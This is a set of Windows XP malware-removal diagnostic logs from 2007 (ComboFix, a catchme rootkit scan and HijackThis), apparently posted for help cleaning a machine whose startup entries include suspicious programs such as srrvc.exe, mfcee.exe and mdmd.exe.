»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\system

»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\Web

»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\system32

»»»»»»»»»»»»»»»»»»»»»»»» C:\Documents and Settings\Sys

»»»»»»»»»»»»»»»»»»»»»»»» C:\Documents and Settings\Sys\Application Data

»»»»»»»»»»»»»»»»»»»»»»»» Start Menu

»»»»»»»»»»»»»»»»»»»»»»»» C:\DOCUME~1\Sys\FAVORI~1

»»»»»»»»»»»»»»»»»»»»»»»» Desktop

»»»»»»»»»»»»»»»»»»»»»»»» C:\Program Files

»»»»»»»»»»»»»»»»»»»»»»»» Corrupted keys

»»»»»»»»»»»»»»»»»»»»»»»» Desktop Components

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components]
"Source"="About:Home"
"SubscribedURL"="About:Home"
"FriendlyName"="My Current Home Page"

»»»»»»»»»»»»»»»»»»»»»»»» Sharedtaskscheduler
!!!Attention, following keys are not inevitably infected!!!

SrchSTS.exe by S!Ri
Search SharedTaskScheduler's .dll

»»»»»»»»»»»»»»»»»»»»»»»» AppInit_DLLs
!!!Attention, following keys are not inevitably infected!!!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"=""

»»»»»»»»»»»»»»»»»»»»»»»» Winlogon.System
!!!Attention, following keys are not inevitably infected!!!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"System"=""

»»»»»»»»»»»»»»»»»»»»»»»» pe386-msguard-lzx32-huy32

»»»»»»»»»»»»»»»»»»»»»»»» Scanning wininet.dll infection

»»»»»»»»»»»»»»»»»»»»»»»» End

2) COMBOFIX REPORT:

"Sys" - 07-02-08 16:20:29 Service Pack 2
ComboFix 07-02-07 - Running from: "C:\Documents and Settings\Sys\Desktop"

(((((((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))

C:\WINDOWS\system32\taskmgr.com
C:\WINDOWS\REGEDIT.com

((((((((((((((((((((((((((((((( Files Created from 2007-01-08 to 2007-02-08 ))))))))))))))))))))))))))))))))))

2007-02-08 16:19 3,024 --a------ C:\WINDOWS\system32\tmp.reg
2007-02-08 16:17 79,360 --a------ C:\WINDOWS\system32\swxcacls.exe
2007-02-08 16:17 53,248 --a------ C:\WINDOWS\system32\Process.exe
2007-02-08 16:17 51,200 --a------ C:\WINDOWS\system32\dumphive.exe
2007-02-08 16:17 40,960 --a------ C:\WINDOWS\system32\swsc.exe
2007-02-08 16:17 288,417 --a------ C:\WINDOWS\system32\SrchSTS.exe
2007-02-08 16:17 135,168 --a------ C:\WINDOWS\system32\swreg.exe
2007-02-08 14:32 67,645 --a------ C:\WINDOWS\system32\drivers\pshook11.sys
2007-02-06 16:01 3,968 --a------ C:\WINDOWS\system32\drivers\AvgAsCln.sys
2007-02-06 15:22 0 --a------ C:\WINDOWS\system32\CMMGR32.EXE
2007-02-06 15:15 <DIR> d-------- C:\DOCUME~1\Sys\Application Data\SUPERAntiSpyware.com
2007-02-06 15:15 <DIR> d-------- C:\DOCUME~1\ALLUSE~1\Application Data\SUPERAntiSpyware.com
2007-02-06 15:14 <DIR> d-------- C:\Program Files\Common Files\Wise Installation Wizard
2007-02-06 13:12 <DIR> d-------- C:\WINDOWS\LastGood
2007-02-06 13:12 <DIR> d-------- C:\WINDOWS\BDOSCAN8
2007-02-05 16:26 <DIR> d-------- C:\VundoFix Backups
2007-02-05 12:16 <DIR> d-------- C:\WINDOWS\Prefetch
2007-02-05 12:15 33,792 --------- C:\WINDOWS\system32\drivers\escanmxx.sys
2007-02-05 12:13 7,583 --a------ C:\WINDOWS\system32\eInstall.dat
2007-02-05 12:13 12,560 --a------ C:\WINDOWS\WSSPORD.DAT
2007-02-05 12:12 <DIR> d-------- C:\PUB
2007-02-05 12:11 508,928 --a------ C:\WINDOWS\system32\eInstall.exe
2007-02-05 12:11 32,768 --a------ C:\WINDOWS\system32\esmxlog.dll
2007-02-05 12:11 138,000 --a------ C:\WINDOWS\system32\drivers\klif108.sys
2007-02-05 12:11 117,008 --a------ C:\WINDOWS\system32\drivers\klif50.sys
2007-02-05 12:11 <DIR> d-------- C:\WINDOWS\system32\ES_SETUP
2007-02-05 12:11 <DIR> d-------- C:\AVPDOS
2007-02-05 12:10 <DIR> d-------- C:\DOCUME~1\ALLUSE~1\Application Data\Avg7
2007-02-05 12:09 950,272 --a------ C:\WINDOWS\system32\contfilt.dll
2007-02-05 12:09 9,488 --a------ C:\WINDOWS\sporder.dll
2007-02-05 12:09 7,680 --a------ C:\WINDOWS\sporder.exe
2007-02-05 12:09 41,984 --a------ C:\WINDOWS\killproc.exe
2007-02-05 12:09 40,448 --a------ C:\WINDOWS\inst_tsp.exe
2007-02-05 12:09 339,968 --a------ C:\WINDOWS\system32\mwtsp.dll
2007-02-05 12:09 14,866 --a------ C:\WINDOWS\winsbak.reg
2007-02-05 12:09 134,144 --a------ C:\WINDOWS\R.COM
2007-02-05 12:09 130,560 --a------ C:\WINDOWS\system32\ZIPDLL.DLL
2007-02-05 12:09 128,512 --a------ C:\WINDOWS\system32\T.COM
2007-02-05 12:09 125,440 --a------ C:\WINDOWS\system32\UNZDLL.DLL
2007-02-05 12:09 118,784 --a------ C:\WINDOWS\system32\mwnsp.dll
2007-02-05 12:09 105,944 --a------ C:\WINDOWS\winsbak2.reg
2007-02-05 12:09 <DIR> d-------- C:\WINDOWS\system32\FLCSS.EXE
2007-02-05 12:09 <DIR> d-------- C:\Program Files\eScan
2007-02-05 12:09 <DIR> d-------- C:\Program Files\Common Files\MicroWorld
2007-02-05 12:09 <DIR> d-------- C:\DOCUME~1\REMOTE~1\Documents
2007-02-05 12:09 <DIR> d-------- C:\DOCUME~1\LOCALS~1\Documents
2007-02-04 15:08 76,589 --a------ C:\DOCUME~1\Sys\3.exe
2007-02-04 11:06 <DIR> d-------- C:\HIJACKTHIS
2007-01-28 14:16 <DIR> d-------- C:\Program Files\Payroll 2007
2007-01-28 14:15 <DIR> d-------- C:\DOCUME~1\Sys\Application Data\{54B1765B-9375-4819-95E7-963DB04D3A42}
2007-01-28 13:09 5,680 --a------ C:\WINDOWS\system32\drivers\psntkd20.sys
2007-01-27 20:58 <DIR> d-------- C:\DOCUME~1\Sys\Application Data\DivX
2007-01-27 20:57 36,624 --------- C:\WINDOWS\system32\drivers\PxHelp20.sys
2007-01-27 20:57 2,560 --------- C:\WINDOWS\system32\drivers\cdralw2k.sys
2007-01-27 20:57 2,432 --------- C:\WINDOWS\system32\drivers\cdr4_xp.sys
2007-01-27 20:57 129,784 --a------ C:\WINDOWS\system32\pxafs.dll
2007-01-27 20:57 118,520 --a------ C:\WINDOWS\system32\pxinsi64.exe
2007-01-27 20:57 116,472 --a------ C:\WINDOWS\system32\pxcpyi64.exe
2007-01-27 20:57 <DIR> d-------- C:\Program Files\DivX
2007-01-27 13:11 <DIR> d--h----- C:\WINDOWS\system32\GroupPolicy
2007-01-27 12:32 8,192 --a------ C:\WINDOWS\system32\tsbyuv.dll
2007-01-27 12:32 49,664 --a------ C:\WINDOWS\system32\vfwwdm32.dll
2007-01-27 12:32 45,568 --a------ C:\WINDOWS\system32\iyuv_32.dll
2007-01-27 12:32 10,240 -ra------ C:\WINDOWS\system32\PA207Usd.dll
2007-01-27 12:31 <DIR> d-------- C:\WINDOWS\LastGood.Tmp
2007-01-27 12:31 <DIR> d-------- C:\Program Files\zebronics webcamera model zeb-100k
2007-01-27 12:31 <DIR> d-------- C:\Program Files\Common Files\PCCamera
2007-01-27 07:48 457,097 --ahs---- C:\WINDOWS\system32\ccbeg.bak2
2007-01-26 17:02 <DIR> d-------- C:\DOCUME~1\Sys\Application Data\Leadertech
2007-01-26 06:49 524,288 --a------ C:\WINDOWS\system32\DivXsm.exe
2007-01-26 06:49 3,596,288 --a------ C:\WINDOWS\system32\qt-dx331.dll
2007-01-26 06:48 200,704 --a------ C:\WINDOWS\system32\ssldivx.dll
2007-01-26 06:48 1,044,480 --a------ C:\WINDOWS\system32\libdivx.dll
2007-01-26 06:43 823,296 --a------ C:\WINDOWS\system32\divx_xx0c.dll
2007-01-26 06:43 823,296 --a------ C:\WINDOWS\system32\divx_xx07.dll
2007-01-26 06:43 802,816 --a------ C:\WINDOWS\system32\divx_xx11.dll
2007-01-26 06:43 738,906 --a------ C:\WINDOWS\system32\DivX.dll
2007-01-26 06:43 73,728 --a------ C:\WINDOWS\system32\dpl100.dll
2007-01-26 06:43 593,920 --a------ C:\WINDOWS\system32\dpuGUI11.dll
2007-01-26 06:43 57,344 --a------ C:\WINDOWS\system32\dpv11.dll
2007-01-26 06:43 53,248 --a------ C:\WINDOWS\system32\dpuGUI10.dll
2007-01-26 06:43 344,064 --a------ C:\WINDOWS\system32\dpus11.dll
2007-01-26 06:43 294,912 --a------ C:\WINDOWS\system32\dpu11.dll
2007-01-26 06:43 294,912 --a------ C:\WINDOWS\system32\dpu10.dll
2007-01-26 06:43 196,608 --a------ C:\WINDOWS\system32\dtu100.dll
2007-01-25 21:43 435,704 --ahs---- C:\WINDOWS\system32\ccbeg.bak1
2007-01-23 20:20 0 --a------ C:\WINDOWS\system32\setup_23367.exe
2007-01-23 20:19 0 --a------ C:\WINDOWS\system32\eraseme_38347.exe
2007-01-21 19:05 <DIR> d-------- C:\Program Files\Common Files\xing shared
2007-01-21 18:53 <DIR> d-------- C:\DOCUME~1\Sys\Application Data\Real
2007-01-16 16:22 <DIR> d-------- C:\DOCUME~1\Sys\Application Data\AdobeAUM
2007-01-16 15:51 <DIR> d-------- C:\DOCUME~1\ALLUSE~1\Application Data\Adobe
2007-01-13 11:32 <DIR> d-------- C:\Program Files\Grisoft

(((((((((((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))))

2007-02-04 12:51 -------- d-------- C:\Program Files\xoftspy
2007-01-30 07:48 -------- d-------- C:\DOCUME~1\Sys\Application Data\skype
2007-01-28 14:15 -------- d-------- C:\DOCUME~1\Sys\Application Data\{54b1765b-9375-4819-95e7-963db04d3a42}
2007-01-28 12:14 -------- d-------- C:\Program Files\spyware nuker
2007-01-28 11:52 -------- d-------- C:\Program Files\yahoo!
2007-01-27 12:31 -------- d--h----- C:\Program Files\installshield installation information
2007-01-22 12:06 -------- d-------- C:\DOCUME~1\Sys\Application Data\adobeum
2007-01-21 19:05 -------- d-------- C:\Program Files\Common Files\real
2007-01-16 16:22 -------- d-------- C:\DOCUME~1\Sys\Application Data\adobe
2007-01-13 12:16 -------- d-------- C:\Program Files\Common Files\symantec shared
2006-12-25 10:36 1682 --ahs---- C:\WINDOWS\system32\kgygaavl.sys
2006-12-21 07:47 304160 --a------ C:\StiImg.dat
2006-12-20 10:33 -------- d-------- C:\DOCUME~1\Sys\Application Data\google
2006-12-20 10:25 -------- d-------- C:\Program Files\google
2006-12-20 10:23 -------- d-------- C:\DOCUME~1\Sys\Application Data\macromedia
2006-12-12 21:54 12288 --a------ C:\WINDOWS\system32\divxwmpexttype.dll
2006-12-12 21:54 118784 --a------ C:\WINDOWS\system32\divxcodecupdatechecker.exe
2006-12-06 11:25 56 -r-hs---- C:\WINDOWS\system32\fc5303fb6f.sys

(((((((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))

*Note* empty entries & legit default entries are not shown

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run]
"ctfmon.exe"="C:\\WINDOWS\\System32\\ctfmon.exe"
"MSMSGS"="\"C:\\Program Files\\Messenger\\msmsgs.exe\" /background"
"Yahoo! Pager"="\"C:\\PROGRA~1\\Yahoo!\\MESSEN~1\\YAHOOM~1.EXE\" -quiet"
"swg"="C:\\Program Files\\Google\\GoogleToolbarNotifier\\1.2.908.8472\\GoogleToolbarNotifier.exe"
"Skype"="\"D:\\Program Files\\Skype\\Phone\\Skype.exe\" /nosplash /minimized"
"john315"="C:\\WINDOWS\\system32\\srrvc.exe"
"staeck12"="C:\\WINDOWS\\system32\\mfcee.exe"
"melg34"="C:\\WINDOWS\\system32\\mdmd.exe"
"SUPERAntiSpyware"="D:\\Program Files\\SUPERAntiSpyware\\SUPERAntiSpyware.exe"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run]
"SMSERIAL"="sm56hlpr.exe"
"RTHDCPL"="RTHDCPL.EXE"
"Alcmtr"="ALCMTR.EXE"
"QuickTime Task"="\"C:\\Program Files\\QuickTime\\qttask.exe\" -atboottime"
"SWN2"="C:\\Program Files\\Spyware Nuker\\swnxt.exe /h"
"DSLSTATEXE"="C:\\Program Files\\GlobespanVirata\\Adsl\\dslstat.exe icon"
"DSLAGENTEXE"="C:\\Program Files\\GlobespanVirata\\Adsl\\dslagent.exe"
"Adobe Photo Downloader"="\"C:\\Program Files\\Adobe\\Photoshop Album Starter Edition\\3.0\\Apps\\apdproxy.exe\""
"TkBellExe"="\"C:\\Program Files\\Common Files\\Real\\Update_OB\\realsched.exe\" -osboot"
"john315"="C:\\WINDOWS\\system32\\srrvc.exe"
"MailScan Dispatcher"="\"C:\\Program Files\\eScan\\LAUNCH.EXE\""
"eScan Updater"="C:\\PROGRA~1\\eScan\\TRAYICOS.EXE /App"
"eScan Monitor"="C:\\PROGRA~1\\eScan\\AVPMWrap.EXE"
"staeck12"="C:\\WINDOWS\\system32\\mfcee.exe"
"melg34"="C:\\WINDOWS\\system32\\mdmd.exe"
"!AVG Anti-Spyware"="\"D:\\Program Files\\AVG Anti-Spyware 7.5\\avgas.exe\" /minimized"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents]

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\IMAIL]
"Installed"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MAPI]
"Installed"="1"
"NoChange"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MSFS]
"Installed"="1"

[HKEY_USERS\.default\software\microsoft\windows\currentversion\runonce]
"RunNarrator"="Narrator.exe"

[HKEY_USERS\s-1-5-18\software\microsoft\windows\currentversion\runonce]
"RunNarrator"="Narrator.exe"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Documents and Settings^Sys^Start Menu^Programs^Startup^PANTONE® for fashion and home 3.0.lnk]
"path"="C:\\Documents and Settings\\Sys\\Start Menu\\Programs\\Startup\\PANTONE® for fashion and home 3.0.lnk"
"backup"="C:\\WINDOWS\\pss\\PANTONE® for fashion and home 3.0.lnkStartup"
"location"="Startup"
"command"="C:\\PROGRA~1\\PANTON~1\\PANTON~1.0\\PANTON~1.EXE "
"item"="PANTONE® for fashion and home 3.0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DownloadAccelerator]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="DAP"
"hkey"="HKLM"
"command"="D:\\PROGRA~1\\DAP\\DAP.EXE /STARTUP"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="iTunesHelper"
"hkey"="HKLM"
"command"="\"D:\\Program Files\\iTunes\\iTunesHelper.exe\""
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="msmsgs"
"hkey"="HKCU"
"command"="\"C:\\Program Files\\Messenger\\msmsgs.exe\" /background"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NeroFilterCheck]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="NeroCheck"
"hkey"="HKLM"
"command"="C:\\WINDOWS\\system32\\NeroCheck.exe"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="qttask"
"hkey"="HKLM"
"command"="\"C:\\Program Files\\QuickTime\\qttask.exe\" -atboottime"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RealTray]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="RealPlay"
"hkey"="HKLM"
"command"="C:\\Program Files\\Real\\RealPlayer\\RealPlay.exe SYSTEMBOOTHIDEPLAYER"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Share-to-Web Namespace Daemon]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="hpgs2wnd"
"hkey"="HKLM"
"command"="D:\\Program Files\\HP Share-to-Web\\hpgs2wnd.exe"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skype]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="Skype"
"hkey"="HKCU"
"command"="\"D:\\Program Files\\Skype\\Phone\\Skype.exe\" /nosplash /minimized"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="jusched"
"hkey"="HKLM"
"command"="\"C:\\Program Files\\Java\\jre1.5.0_08\\bin\\jusched.exe\""
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SWN2]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="swnxt"
"hkey"="HKLM"
"command"="C:\\Program Files\\Spyware Nuker\\swnxt.exe /h"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\WinampAgent]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="Winampa"
"hkey"="HKLM"
"command"="\"D:\\Program Files\\Winamp\\Winampa.exe\""
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="YAHOOM~1"
"hkey"="HKCU"
"command"="\"C:\\PROGRA~1\\Yahoo!\\MESSEN~1\\YAHOOM~1.EXE\" -quiet"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shellexecutehooks]
"{481E7983-1F2B-4250-951A-44E0902DF978}"=""
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"=""
"{57B86673-276A-48B2-BAE7-C6DBB3020EB8}"="AVG Anti-Spyware 7.5"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"SynchronousMachineGroupPolicy"=dword:00000000
"SynchronousUserGroupPolicy"=dword:00000000

HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll"

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Svchost]
LocalService REG_MULTI_SZ AlerterWebClientLmHostsRemoteRegistryupnphostSSDPSRV\
NetworkService REG_MULTI_SZ DnsCache\
rpcss REG_MULTI_SZ RpcSs\
imgsvc REG_MULTI_SZ StiSvc\
termsvcs REG_MULTI_SZ TermService\

********************************************************************

catchme 0.1 W2K/XP - userland rootkit detector by Gmer, 17 October 2006
http://www.gmer.net

scanning hidden processes ...
scanning hidden services ...
scanning hidden autostart entries ...
scanning hidden files ...
scan completed successfully
hidden processes: 0
hidden services: 0
hidden files: 0

********************************************************************

Completion time: 07-02-08 16:23:19

3) NEW HIJACK THIS LOG:

Logfile of HijackThis v1.99.1
Scan saved at 4:24:54 PM, on 2/8/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\eScan\TRAYSSER.EXE
C:\PROGRA~1\eScan\avpm.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWAgent.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\sm56hlpr.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Spyware Nuker\swnxt.exe
C:\Program Files\GlobespanVirata\Adsl\dslstat.exe
C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\PROGRA~1\eScan\TRAYICOS.EXE
C:\PROGRA~1\eScan\AVPMWrap.EXE
D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\PROGRA~1\eScan\AvpM.exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
D:\Program Files\Skype\Phone\Skype.exe
D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\SAMSUNG\Samsung Multimedia Keyboard\gpkbd.exe
D:\PROGRA~1\DAP\DAP.EXE
C:\PROGRA~1\eScan\MAILDISP.EXE
C:\PROGRA~1\ESCAN\SPOOLER.EXE
C:\PROGRA~1\eScan\MAILSCAN.EXE
C:\PROGRA~1\eScan\kavss.exe
C:\HIJACKTHIS\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.co.in/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = iexplore
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: DAPHelper Class - {0000CC75-ACF3-4cac-A0A9-DD3868E06852} - D:\Program Files\DAP\DAPBHO.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {481E7983-1F2B-4250-951A-44E0902DF978} - (no file)
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: (no name) - {68D5CF1D-EC5C-4bdd-A9EF-F0E517565D50} - (no file)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: (no name) - {F2496031-4FE4-497E-8F75-04E0A180366E} - C:\WINDOWS\System32\vtsqn.dll (file missing)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: DAP Bar - {62999427-33FC-4baf-9C9C-BCE6BD127F08} - D:\Program Files\DAP\DAPIEBar.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SMSERIAL] sm56hlpr.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SWN2] C:\Program Files\Spyware Nuker\swnxt.exe /h
O4 - HKLM\..\Run: [DSLSTATEXE] C:\Program Files\GlobespanVirata\Adsl\dslstat.exe icon
O4 - HKLM\..\Run: [DSLAGENTEXE] C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKLM\..\Run: [MailScan Dispatcher] "C:\Program Files\eScan\LAUNCH.EXE"
O4 - HKLM\..\Run: [eScan Updater] C:\PROGRA~1\eScan\TRAYICOS.EXE /App
O4 - HKLM\..\Run: [eScan Monitor] C:\PROGRA~1\eScan\AVPMWrap.EXE
O4 - HKLM\..\Run: [staeck12] C:\WINDOWS\system32\mfcee.exe
O4 - HKLM\..\Run: [melg34] C:\WINDOWS\system32\mdmd.exe
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [Skype] "D:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKCU\..\Run: [staeck12] C:\WINDOWS\system32\mfcee.exe
O4 - HKCU\..\Run: [melg34] C:\WINDOWS\system32\mdmd.exe
O4 - HKCU\..\Run: [SUPERAntiSpyware] D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Samsung Multimedia Keyboard.lnk = ?
O8 - Extra context menu item: &Download with &DAP - D:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Advanced Email Extractor - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html
O8 - Extra context menu item: Download &all with DAP - D:\PROGRA~1\DAP\dapextie2.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://D:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Scan link with AEE - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/link.html
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
